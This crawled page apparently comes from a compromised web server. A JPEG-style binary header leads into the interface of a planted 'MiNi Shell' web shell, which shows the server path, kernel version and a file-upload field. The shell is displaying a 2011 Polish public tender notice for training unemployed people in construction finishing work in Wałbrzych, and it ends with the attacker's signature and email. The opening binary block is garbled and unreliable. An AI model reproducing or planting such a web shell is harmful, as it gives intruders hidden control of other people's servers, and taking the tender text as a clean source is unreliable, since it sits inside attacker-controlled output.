JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110405/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110405/66168-N-2011.html

<p class="kh_header"><b>Wałbrzych: Wykonanie szkolenia osób bezrobotnych z zakresu prac wykończeniowych w budownictwie dla Powiatowego Urzędu Pracy w Wałbrzychu</b><br>
<b>Numer ogłoszenia: 66168 - 2011; data zamieszczenia: 05.04.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy w Wałbrzychu , ul. Ogrodowa 5b, 58-306 Wałbrzych, woj. dolnośląskie, tel. 074 8407300, faks 074 8407376.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.urzadpracy.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie szkolenia osób bezrobotnych z zakresu prac wykończeniowych w budownictwie dla Powiatowego Urzędu Pracy w Wałbrzychu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest realizacja szkolenia dla uprawnionych kobiet i mężczyzn z Powiatu Wałbrzyskiego. W ramach zamówienia przeprowadzone zostanie jedno szkolenie grupowe. Łącznie szkoleniem objętych zostanie 10 osób i obejmować będzie zajęcia praktyczne jak i teoretyczne. W ramach przedmiotu zamówienia wykonawca zobowiązany będzie przeszkolić kursantów w szczególności w następującym zakresie:
-prace malarskie, 
-montaż płyt kartonowo - gipsowych
-wykonywanie okładzin z tworzyw sztucznych na powierzchniach ściennych..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 29.07.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1) kserokopię aktualnego dokumentu potwierdzającego dokonanie wpisu do rejestru instytucji szkoleniowych wydanego na podstawie art. 20 ust. 4 Ustawy o promocji zatrudnienia i instytucjach rynku pracy (t. j. Dz. U. z 2008r. Nr 69 poz. 415 z późn. zm.) przez wojewódzki urząd pracy właściwy ze względu na siedzibę instytucji szkoleniowej;
Ocena spełnienia ww. warunku dokonana będzie przez Zamawiającego wg formuły spełnia nie spełnia. Zamawiający zastrzega sobie prawo weryfikacji złożonych przez Wykonawcę w ofercie dokumentów i oświadczeń.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy, którzy w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia ich działalności jest krótszy - w tym okresie - wykonali, a w przypadku świadczeń okresowych lub ciągłych - wykonują: co najmniej 2 usługi przeprowadzenia szkoleń / kursów  z zakresu przyuczenia do prac remontowo - budowlanych dla grupy minimum 5 osobowej.
Ocena spełnienia ww. warunku dokonana będzie przez Zamawiającego wg formuły spełnia, nie spełnia. Zamawiający zastrzega sobie prawo weryfikacji złożonych przez Wykonawcę w ofercie dokumentów i oświadczeń</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Osoby prowadzące zajęcia dydaktyczne muszą posiadać odpowiednie przygotowanie merytoryczne do prowadzenia zajęć powierzonych im przez Wykonawcę. Stąd też Zamawiający zastrzega sobie, aby Wykonawca dysponował min. 1 osobą przeznaczoną do realizacji zajęć teoretycznych z zakresu nauki zawodu legitymowały się doświadczeniem w prowadzeniu zajęć dla młodzieży lub osób dorosłych zdobytym na przestrzeni trzech lat licząc wstecz od daty złożenia przez Wykonawcę oferty szkoleniowej, z zakresu któregokolwiek z poniższych zagadnień
- Przepisy BHP i ppoż. na stanowisku pracy;
- Materiałoznawstwo;
- Podstawowe pojęcia z zakresu budownictwa;
- Posługiwanie się dokumentacją techniczną;
- Rozpoznawanie podstawowych materiałów budowlanych;
- Magazynowanie, składowanie i transportowanie materiałów budowlanych;
- Dobieranie materiałów, narzędzi i sprzętu ;
- Malowanie farbą klejową, emulsją i olejną;
- Wykonywanie powłok lakierniczych;
- Montaż płyt kartonowo - gipsowych;
- Wykonywanie gładzi gipsowej;
- Wykonywanie naściennych wykładzin z tworzyw sztucznych (wykładziny PCV - wykorzystywane w obiektach użyteczności publicznej);.
Osoby, prowadzące zajęcia praktyczne muszą posiadać odpowiednie przygotowanie merytoryczne do prowadzenia zajęć powierzonych im przez Wykonawcę. Stąd też Zamawiający zastrzega sobie aby Wykonawca dysponował min. 1 osobą przeznaczoną do realizacji zajęć, która posiada doświadczenie w charakterze instruktora nauki w zawodach związanych z przedmiotem zamówienia lub doświadczenia w kierowaniu zespołem pracowników odpowiedzialnych za prowadzenie prac wykończeniowych w budownictwie. Zamawiający dopuszcza, aby w/w warunki dotyczące zajęć praktycznych jak i zajęć teoretycznych zostały spełnione przez tę samą osobę.
Ocena spełnienia ww. warunku dokonana będzie przez Zamawiającego wg formuły spełnia, nie spełnia. Zamawiający zastrzega sobie prawo weryfikacji złożonych przez Wykonawcę w ofercie dokumentów i oświadczeń</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>W celu potwierdzenia spełniania poprzez oferowane usługi wymagań określonych przez zmawiającego wykonawcy zobowiązani są dołączyć następujące dokumenty i oświadczenia:
1) kserokopię certyfikatu jakości usług, o ile go posiada: np.: certyfikat wydany na podstawie  międzynarodowych norm ISO lub inny znak jakości (z którego jednoznacznie wynika, że instytucja szkoleniowa jest certyfikowana w zakresie realizacji szkolenia będącego przedmiotem zamówienia lub w ogóle w zakresie realizacji/świadczenia usług szkoleniowych);
2) Wzór zaświadczenia sporządzonego zgodnie z przepisami Ministra Edukacji i Nauki (Rozporządzenie z dnia 3 lutego 2006r. w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych Dz. U. Nr 31, poz. 216) zawierającego zgodnie z Rozporządzeniem Ministra Pracy i Polityki Społecznej z dnia 14 września 2010r. w sprawie standardów i warunków prowadzenia usług rynku pracy (Dz.U. z 2010r. Nr 177, poz.1193) :
a) numer z rejestru ,
b) imię i nazwisko oraz numer PESEL uczestnika szkolenia, a w przypadku cudzoziemca numer dokumentu stwierdzającego tożsamość,
c) formę i nazwę szkolenia,
d) okres trwania szkolenia,
e) miejsce i datę wydania zaświadczenia lub innego dokumentu potwierdzającego ukończenie szkolenie i uzyskanie kwalifikacji,
f) tematy i wymiar godzin zajęć edukacyjnych,
g) podpis osoby upoważnionej przez instytucję szkoleniową przeprowadzającą szkolenie
h) nazwę instytucji szkoleniowej przeprowadzającej szkolenie,</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 40</li>
<li>2 - Posiadany certyfikat jakości świadczonych przez Wykonawcę usług - 10</li>
<li>3 - Doświadczenie kadry dydaktycznej - 20</li>
<li>4 - Sposób realizacji zajęć praktycznych - 30</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza wprowadzenie zmian dotyczących postanowień zawartej umowy pod warunkiem, że m.in. Wykonawca powiadomi Zamawiającego o konieczności wprowadzenia niniejszych zmian jak również przedstawi okoliczności powodujące konieczność ich wprowadzenia oraz uzyska pisemną zgodę Zamawiającego. Zmiany, o których mowa powyżej mogą dotyczyć:
1) oznaczenia stron zawartej umowy (np. zmiana nazwy, siedziby, NIP-u, REGON-u, osób reprezentujących firmę),
2) terminu realizacji szkolenia z przyczyn niezależnych od Wykonawcy (np. działanie siły 	wyższej), pod warunkiem dostarczenia Zamawiającemu planu zajęć szkoleniowych uwzględniającego niniejsze zmiany, sporządzonego zgodnie z pkt. 9 informacji uzupełniających (zmiana terminu nie może nastąpić w sytuacji braku dostępności kadry 	prowadzącej szkolenie),
3) miejsca realizacji szkolenia w sytuacji pojawienia się istotnych okoliczności, które 	uniemożliwią ich przeprowadzenie w miejscu określonym w złożonej ofercie (nowe miejsce 	w przypadku: 
a) zajęć teoretycznych winno spełniać wymagania określone przez Zamawiającego oraz być wyposażone w sprzęt oraz pomoce dydaktyczne na poziome odpowiadającym ofercie, 
b) zajęć praktycznych  winno odpowiadać założeniom jakie przyjęte zostały, aby 	zrealizować założone minimum programowe oraz umożliwić pełne wykorzystanie 	zabezpieczonych na obsługę szkolenia materiałów, narzędzi i urządzeń) 
4) rachunku bankowego pod warunkiem dostarczenia dokumentu poświadczającego ten 	fakt,
5) kadry w razie niedostępności personelu określonego w wykazie kadry szkoleniowej 	przedstawionym w ofercie pod warunkiem, że Wykonawca zapewni zastępstwo przez 	osobę lub osoby o odpowiednim przygotowaniu zawodowym, nie gorszym od 	przygotowania zawodowego osoby lub osób zastępowanych. Zastępca będzie mógł 	przystąpić do realizacji prac przewidzianych w umowie po uzyskaniu przez Wykonawcę 	pisemnej zgody ze strony Zamawiającego.
6) wzoru któregokolwiek dokumentu potwierdzającego zakończenie szkolenia w sytuacji kiedy np. zmianie ulegną obowiązujące w tym zakresie przepisy,
7) zmniejszenia przez Wykonawcę kwoty preliminowanych kosztów związanych z 	realizowanym przedmiotem umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.urzadpracy.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy w Wałbrzychu
ul. Ogrodowa 5b
58-306 Wałbrzych
pok. 401B.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.04.2011 godzina 12:45, miejsce: Oferty należy składać w siedzibie zamawiającego ul. Ogrodowa 5b, 58-306 Wałbrzych, w kancelarii (parter).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com